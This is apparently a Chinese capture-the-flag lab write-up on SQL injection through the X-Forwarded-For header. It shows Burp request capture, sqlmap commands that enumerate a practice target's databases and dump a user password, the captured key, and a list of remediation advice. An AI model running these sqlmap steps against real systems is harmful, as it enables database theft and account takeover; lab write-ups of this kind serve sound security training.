X-Forwarded-For注入漏洞

0x 00 环境介绍

靶机http://219.153.49.228:48033,通过注入完成找到网站的key。


1 |0 0x01复现过程

1.访问网站使用admin/admin登入,用burpsuite截包寻找注入点

>>截到的包,正常放包回显内容

>>加X-forwarded-for:1.1.1.1回显IP数据改变,可能存在注入点

2.保存post包进行sql注入

保存post包1.txt,加上X-forwarded-for:*作为注入点,在windows上使用sqlmap跑

暴库:python sqlmap.py -r 1.txt --dbs --batch

开始试了很多次,payload也换了几个了没成功,后来发现请求头和请求体没有分开。

>>修改后

a.暴数据库

python sqlmap.py -r 1.txt --dbs

b.暴数据表

python sqlmap.py -r 1.txt -D webcalendar --tables

c.暴列表

python sqlmap.py -r 1.txt -D webcalendar -T user --columns

d.暴字段

python sqlmap.py -r 1.txt -D webcalendar -T user "password" --dumps

3.使用admin/116012900登入拿到key:mozhebb8300a328e13dd2abd55c5d8dd


1 |1 0x02修复建议

(1)程序代码里的所有查询语句,使用标准化的数据库查询语句API接口,设定语句的参数进行过滤一些非法的字符,防止用户输入恶意的字符传入到数据库中执行sql语句。

(2)对用户提交的的参数安全过滤,像一些特殊的字符(,()*&......%#等等)进行字符转义操作,以及编码的安全转换。

(3)网站的代码层编码尽量统一,建议使用utf8编码,如果代码里的编码都不一样,会导致一些过滤被直接绕过。

(4)网站的数据类型,必须确定,是数字型,就是数字型,字符型就是字符型,数据库里的存储字段类型也设置为ini型。

(5)对用户的操作权限进行安全限制,普通用户只给普通权限,管理员后台的操作权限要放开,尽量减少对数据库的恶意攻击。

(6)网站的报错信息尽量不要返回给客户端,比如一些字符错误,数据库的报错信息,尽可能的防止泄露给客户端。


1 |2 0x03总结思考

首先通过回显页面异常找到对应的注入点,将post文件保存,然后使用sqlmap跑post包,另外请求体和请求头一定要分开。

相关推荐
kali-Myon31 分钟前
快速解决 Docker 环境中无法打开 gdb 调试窗口以及 tmux 中无法滚动页面内容和无法选中复制的问题
运维·安全·docker·容器·gdb·pwn·tmux
专注VB编程开发20年31 分钟前
C#内存加载dll和EXE是不是差不多,主要是EXE有入口点
数据库·windows·microsoft·c#
黑客思维者34 分钟前
为什么Linux常被提权操作?
linux·网络·安全
地狱为王37 分钟前
Windows下编译coturn
windows
wanhengidc1 小时前
云手机存在哪些技术瓶颈
运维·服务器·安全·智能手机·生活
YCOSA20251 小时前
雨晨 Win7SP1 企业版 IE11 VCDX x64 极速 7601.28064
windows
吕了了2 小时前
给U盘一个PE to Go:将微PE系统直接释放到U盘
运维·windows·电脑·系统
acrelgxy3 小时前
告别盲测,预见温度:安科瑞如何用无线技术革新变电站安全
分布式·安全·电力监控系统·智能电力仪表
智驱力人工智能3 小时前
加油站静电夹检测 视觉分析技术的安全赋能与实践 静电夹检测 加油站静电夹状态监测 静电接地报警器检测
人工智能·深度学习·算法·安全·yolo·边缘计算
总有刁民想爱朕ha3 小时前
MySQL 8 Windows日常维护教程(安装、备份、还原、重置密码等)
windows·mysql